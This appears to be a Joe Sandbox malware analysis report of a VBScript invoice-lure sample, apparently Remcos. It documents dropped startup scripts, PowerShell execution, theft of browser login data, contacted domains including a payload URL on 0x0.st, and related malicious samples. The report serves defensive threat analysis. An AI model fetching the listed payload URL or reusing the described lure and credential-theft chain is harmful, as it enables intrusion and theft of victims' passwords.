Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

barindex
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information222
Scripting		Valid Accounts122
Command and Scripting Interpreter		222
Scripting		11
Process Injection		1
Masquerading		1
OS Credential Dumping		1
Security Software Discovery		Remote Services1
Data from Local System		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Exploitation for Client Execution		2
Registry Run Keys / Startup Folder		2
Registry Run Keys / Startup Folder		21
Virtualization/Sandbox Evasion		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts21
PowerShell		1
DLL Side-Loading		1
DLL Side-Loading		11
Process Injection		Security Account Manager21
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture13
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Software Packing		LSA Secrets1
System Network Configuration Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials2
File and Directory Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync12
System Information Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1617742 Sample: Commercial Invoice Confirma... Startdate: 18/02/2025 Architecture: WINDOWS Score: 100 51 reallyfreegeoip.org 2->51 53 checkip.dyndns.org 2->53 55 2 other IPs or domains 2->55 67 Multi AV Scanner detection for submitted file 2->67 69 Sigma detected: Drops script at startup location 2->69 71 Sample has a suspicious name (potential lure to open the executable) 2->71 75 4 other signatures 2->75 10 wscript.exe 2 2->10         started        14 cmd.exe 1 2->14         started        signatures3 73 Tries to detect the country of the analysis system (by using the IP) 51->73 process4 file5 49 C:\Users\user\AppData\Local\...\3h6QL1gQ.bat, ASCII 10->49 dropped 89 VBScript performs obfuscated calls to suspicious functions 10->89 91 Wscript starts Powershell (via cmd or directly) 10->91 93 Windows Scripting host queries suspicious COM object (likely to drop second stage) 10->93 95 Suspicious execution chain found 10->95 16 cmd.exe 1 10->16         started        19 cmd.exe 1 14->19         started        21 conhost.exe 14->21         started        signatures6 process7 signatures8 63 Wscript starts Powershell (via cmd or directly) 16->63 65 Suspicious command line found 16->65 23 cmd.exe 1 16->23         started        26 conhost.exe 16->26         started        28 powershell.exe 19->28         started        30 conhost.exe 19->30         started        32 cmd.exe 1 19->32         started        process9 signatures10 81 Wscript starts Powershell (via cmd or directly) 23->81 83 Suspicious command line found 23->83 34 powershell.exe 15 17 23->34         started        39 conhost.exe 23->39         started        41 cmd.exe 1 23->41         started        85 Suspicious powershell command line found 28->85 87 Tries to harvest and steal browser information (history, passwords, etc) 28->87 43 powershell.exe 28->43         started        process11 dnsIp12 57 checkip.dyndns.com 132.226.247.73, 49706, 49711, 80 UTMEMUS United States 34->57 59 0x0.st 168.119.145.117, 443, 49705, 49710 HETZNER-ASDE Germany 34->59 61 reallyfreegeoip.org 104.21.16.1, 443, 49707, 49712 CLOUDFLARENETUS United States 34->61 47 C:\Users\user\...\StartupScript_75adaf3d.cmd, ASCII 34->47 dropped 77 Suspicious powershell command line found 34->77 79 Found suspicious powershell code related to unpacking or dynamic code loading 34->79 45 powershell.exe 8 34->45         started        file13 signatures14 process15

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Commercial Invoice Confirmation-1132346.vbs13%VirustotalBrowse
Commercial Invoice Confirmation-1132346.vbs11%ReversingLabsScript-WScript.Trojan.Remcos

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://0x0.st/8ZDa.txt0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
reallyfreegeoip.org
104.21.16.1
truefalse
    		high
    0x0.st
    		168.119.145.117
    		truefalse
      		high
      checkip.dyndns.com
      		132.226.247.73
      		truefalse
        		high
        checkip.dyndns.org
        		unknown
        		unknownfalse
          		high

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          https://0x0.st/8ZDa.txtfalse
          • Avira URL Cloud: safe
          		unknown
          http://checkip.dyndns.org/false
            		high
            https://reallyfreegeoip.org/xml/8.46.123.189false
              		high

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://aka.ms/pscore6lBpowershell.exe, 00000008.00000002.1451631801.00000000048B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1451631801.00000000048A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1615757671.00000000047D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1615757671.00000000047E8000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000008.00000002.1451631801.0000000004882000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1615757671.0000000004805000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  104.21.16.1
                  		reallyfreegeoip.orgUnited States
                  		13335CLOUDFLARENETUSfalse
                  168.119.145.117
                  		0x0.stGermany
                  		24940HETZNER-ASDEfalse
                  132.226.247.73
                  		checkip.dyndns.comUnited States
                  		16989UTMEMUSfalse

                  General Information

                  Joe Sandbox version:42.0.0 Malachite
                  Analysis ID:1617742
                  Start date and time:2025-02-18 08:23:31 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 5m 19s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:20
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:Commercial Invoice Confirmation-1132346.vbs
                  Detection:MAL
                  Classification:mal100.spyw.expl.evad.winVBS@25/14@3/3
                  EGA Information:Failed
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 6
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Found application associated with file extension: .vbs

                  Warnings

                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                  • Excluded IPs from analysis (whitelisted): 4.245.163.56
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target powershell.exe, PID 8180 because it is empty
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  02:24:31API Interceptor3633342x Sleep call for process: powershell.exe modified
                  08:24:37AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_75adaf3d.cmd

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  104.21.16.1PO from tpc Type 34.1 34,2 35 Spec.jsGet hashmaliciousFormBookBrowse
                  • www.lucynoel6465.shop/jgkl/
                  PO from tpc Type 34.1 34,2 35 Spec 1.jsGet hashmaliciousFormBookBrowse
                  • www.tumbetgirislinki.fit/k566/
                  ebu.ps1Get hashmaliciousFormBookBrowse
                  • www.fz977.xyz/48bq/
                  BIS_MT103 101T000000121121.exeGet hashmaliciousFormBookBrowse
                  • www.cheapwil.shop/ekxu/
                  crypt.exeGet hashmaliciousFormBookBrowse
                  • www.clouser.store/0izs/
                  ReODK2A5DB.exeGet hashmaliciousFormBookBrowse
                  • www.sigaque.today/n61y/
                  xBA5hw2TjG.exeGet hashmaliciousFormBookBrowse
                  • www.fz977.xyz/406r/
                  jKR1K8ayHT.exeGet hashmaliciousFormBookBrowse
                  • www.axis138ae.shop/do5s/
                  greatnamechangedwithgoodnews.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                  • www.shlomi.app/r0jq/
                  http://dryade.cutegreetingcakes.com/ga/click/2-263541735-21475-52792-103465-64017-800122d652-72691c1ea5Get hashmaliciousUnknownBrowse
                  • dryade.cutegreetingcakes.com/ga/click/2-263541735-21475-52792-103465-64017-800122d652-72691c1ea5
                  168.119.145.117Maersk_shipping_documents_Awb_BL_Inv000000000000000000000pdf.batGet hashmaliciousUnknownBrowse
                    Awb_Shipping_Documents_0000000.batGet hashmaliciousUnknownBrowse
                      ShippingdocumentsAwbBLInv0000000pdf.vbsGet hashmaliciousUnknownBrowse
                        0000000.batGet hashmaliciousUnknownBrowse
                          Xclient.vbsGet hashmaliciousAsyncRAT, XWormBrowse
                            OC 23558 EINSA F2420.vbsGet hashmaliciousUnknownBrowse
                              Teufelberger,pdf.vbsGet hashmaliciousRemcos, PureLog Stealer, zgRATBrowse
                                REMMITTANCE ADVICE- 12.02.25_PNG.vbsGet hashmaliciousUnknownBrowse
                                  Attached order.vbsGet hashmaliciousUnknownBrowse
                                    tOpxHK0Z2U.batGet hashmaliciousRemcosBrowse
                                      132.226.247.73rJustificante67.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                      • checkip.dyndns.org/
                                      mMS2hfsyJd.imgGet hashmaliciousMassLogger RATBrowse
                                      • checkip.dyndns.org/
                                      Nonmerchantable.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                      • checkip.dyndns.org/
                                      JUSTIFICANTE DE TRANSFERENCIA.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                      • checkip.dyndns.org/
                                      Hermaean.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                      • checkip.dyndns.org/
                                      24602711 OR Invoice.pdf.scrGet hashmaliciousMassLogger RATBrowse
                                      • checkip.dyndns.org/
                                      Purchase Order No.1364.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • checkip.dyndns.org/
                                      4a. RFx-4045.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                      • checkip.dyndns.org/
                                      RFQ-Ref-QE-69774-LD,PDF.vbsGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                      • checkip.dyndns.org/
                                      Q-M20251302.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                      • checkip.dyndns.org/

                                      Domains

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      checkip.dyndns.comjjmax il.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 132.226.8.169
                                      FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeGet hashmaliciousDBatLoader, Snake Keylogger, VIP KeyloggerBrowse
                                      • 132.226.8.169
                                      nDHL_CUSTOM_CLEARANCE_FORM_3409249_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                      • 193.122.6.168
                                      DHL AWB Document_pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                      • 193.122.130.0
                                      useeeerrrrr.jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 193.122.130.0
                                      15300429772_20250121_09114163_HesapOzeti.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 193.122.130.0
                                      swift copy.bat.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 193.122.6.168
                                      Order007556.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 158.101.44.242
                                      Ziraat_Bankasi_Swift_Messaji.cmdGet hashmaliciousDBatLoader, Snake Keylogger, VIP KeyloggerBrowse
                                      • 158.101.44.242
                                      rJustificante67.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                      • 132.226.247.73
                                      0x0.stMaersk_shipping_documents_Awb_BL_Inv000000000000000000000pdf.batGet hashmaliciousUnknownBrowse
                                      • 168.119.145.117
                                      Awb_Shipping_Documents_0000000.batGet hashmaliciousUnknownBrowse
                                      • 168.119.145.117
                                      ShippingdocumentsAwbBLInv0000000pdf.vbsGet hashmaliciousUnknownBrowse
                                      • 168.119.145.117
                                      0000000.batGet hashmaliciousUnknownBrowse
                                      • 168.119.145.117
                                      Xclient.vbsGet hashmaliciousAsyncRAT, XWormBrowse
                                      • 168.119.145.117
                                      OC 23558 EINSA F2420.vbsGet hashmaliciousUnknownBrowse
                                      • 168.119.145.117
                                      Teufelberger,pdf.vbsGet hashmaliciousRemcos, PureLog Stealer, zgRATBrowse
                                      • 168.119.145.117
                                      REMMITTANCE ADVICE- 12.02.25_PNG.vbsGet hashmaliciousUnknownBrowse
                                      • 168.119.145.117
                                      Attached order.vbsGet hashmaliciousUnknownBrowse
                                      • 168.119.145.117
                                      tOpxHK0Z2U.batGet hashmaliciousRemcosBrowse
                                      • 168.119.145.117
                                      reallyfreegeoip.orgjjmax il.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 104.21.64.1
                                      FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeGet hashmaliciousDBatLoader, Snake Keylogger, VIP KeyloggerBrowse
                                      • 104.21.32.1
                                      nDHL_CUSTOM_CLEARANCE_FORM_3409249_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                      • 104.21.96.1
                                      DHL AWB Document_pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                      • 104.21.32.1
                                      useeeerrrrr.jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 104.21.80.1
                                      15300429772_20250121_09114163_HesapOzeti.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 104.21.80.1
                                      swift copy.bat.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 104.21.32.1
                                      Order007556.exeGet hashmaliciousSnake KeyloggerBrowse
                                      • 104.21.64.1
                                      Ziraat_Bankasi_Swift_Messaji.cmdGet hashmaliciousDBatLoader, Snake Keylogger, VIP KeyloggerBrowse
                                      • 104.21.112.1
                                      rJustificante67.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                      • 104.21.64.1

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      CLOUDFLARENETUSjjmax il.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 104.21.64.1
                                      Payment_Activity_0104_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                      • 104.22.74.216
                                      Payment_Activity_0104_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                      • 172.67.74.232
                                      Payment_Activity_0104_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                      • 104.18.27.193
                                      FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeGet hashmaliciousDBatLoader, Snake Keylogger, VIP KeyloggerBrowse
                                      • 104.21.32.1
                                      Payment_Activity_0079_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                      • 104.18.27.193
                                      Payment_Activity_0079_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                      • 172.67.23.234
                                      Payment_Activity_0079_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                      • 104.18.66.57
                                      payment1.jsGet hashmaliciousFormBookBrowse
                                      • 104.21.16.1
                                      Rooming list.jsGet hashmaliciousRemcosBrowse
                                      • 104.20.3.235
                                      HETZNER-ASDE2024-02-17.jsGet hashmaliciousFormBookBrowse
                                      • 144.76.229.203
                                      PO.exeGet hashmaliciousFormBookBrowse
                                      • 144.76.229.203
                                      na.elfGet hashmaliciousPrometeiBrowse
                                      • 88.198.246.242
                                      ORD_VIO-002-2025e-O001.exeGet hashmaliciousFormBookBrowse
                                      • 144.76.229.203
                                      Maersk_shipping_documents_Awb_BL_Inv000000000000000000000pdf.batGet hashmaliciousUnknownBrowse
                                      • 168.119.145.117
                                      Xw9oZv75Ze.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, VidarBrowse
                                      • 5.75.210.149
                                      LWWWDBoeGo.exeGet hashmaliciousAmadey, GCleaner, LummaC Stealer, VidarBrowse
                                      • 5.75.210.149
                                      hHtR1O06GH.exeGet hashmaliciousAmadey, Healer AV Disabler, LummaC Stealer, Stealc, VidarBrowse
                                      • 5.75.210.149
                                      na.elfGet hashmaliciousPrometeiBrowse
                                      • 88.198.246.242
                                      na.elfGet hashmaliciousPrometeiBrowse
                                      • 88.198.246.242
                                      UTMEMUSjjmax il.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 132.226.8.169
                                      FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeGet hashmaliciousDBatLoader, Snake Keylogger, VIP KeyloggerBrowse
                                      • 132.226.8.169
                                      rJustificante67.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                      • 132.226.247.73
                                      rJustificante67.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                      • 132.226.8.169
                                      mMS2hfsyJd.imgGet hashmaliciousMassLogger RATBrowse
                                      • 132.226.247.73
                                      REQUIRED-ORDER-REFERENCE-WITH-COMPANY-DETAILS.cmdGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                      • 132.226.8.169
                                      Nonmerchantable.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                      • 132.226.247.73
                                      pfYNBAkPIwsCPTS.exeGet hashmaliciousMassLogger RATBrowse
                                      • 132.226.8.169
                                      JUSTIFICANTE DE TRANSFERENCIA.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                      • 132.226.247.73
                                      Hermaean.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                      • 132.226.247.73

                                      JA3 Fingerprints

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      3b5074b1b5d032e5620f69f9f700ff0ejjmax il.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 168.119.145.117
                                      • 104.21.16.1
                                      Payment_Activity_0104_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                      • 168.119.145.117
                                      • 104.21.16.1
                                      Payment_Activity_0104_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                      • 168.119.145.117
                                      • 104.21.16.1
                                      Payment_Activity_0104_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                      • 168.119.145.117
                                      • 104.21.16.1
                                      FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeGet hashmaliciousDBatLoader, Snake Keylogger, VIP KeyloggerBrowse
                                      • 168.119.145.117
                                      • 104.21.16.1
                                      Payment_Activity_0079_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                      • 168.119.145.117
                                      • 104.21.16.1
                                      Payment_Activity_0079_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                      • 168.119.145.117
                                      • 104.21.16.1
                                      Payment_Activity_0079_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                      • 168.119.145.117
                                      • 104.21.16.1
                                      Rooming list.jsGet hashmaliciousRemcosBrowse
                                      • 168.119.145.117
                                      • 104.21.16.1
                                      nDHL_CUSTOM_CLEARANCE_FORM_3409249_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                      • 168.119.145.117
                                      • 104.21.16.1

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:modified
                                      Size (bytes):5829
                                      Entropy (8bit):4.901113710259376
                                      Encrypted:false
                                      SSDEEP:96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
                                      MD5:7827E04B3ECD71FB3BD7BEEE4CA52CE8
                                      SHA1:22813AF893013D1CCCACC305523301BB90FF88D9
                                      SHA-256:5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
                                      SHA-512:D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
                                      Malicious:false
                                      Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):64
                                      Entropy (8bit):0.34726597513537405
                                      Encrypted:false
                                      SSDEEP:3:Nlll:Nll
                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                      Malicious:false
                                      Preview:@...e...........................................................

                                      C:\Users\user\AppData\Local\Temp\3h6QL1gQ.bat

                                      Download File
                                      Process:C:\Windows\System32\wscript.exe
                                      File Type:ASCII text, with very long lines (48450), with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):56561
                                      Entropy (8bit):6.027350559479858
                                      Encrypted:false
                                      SSDEEP:768:a9YLNQaBdGzFXP/3gXI6URGzFj85FGB9W3Q3ZhGAivdgcKd7RPZ125tA/Ue5ZU:a9iQMGZXPvgXyFGT9Vilgvd7RB05OMuK
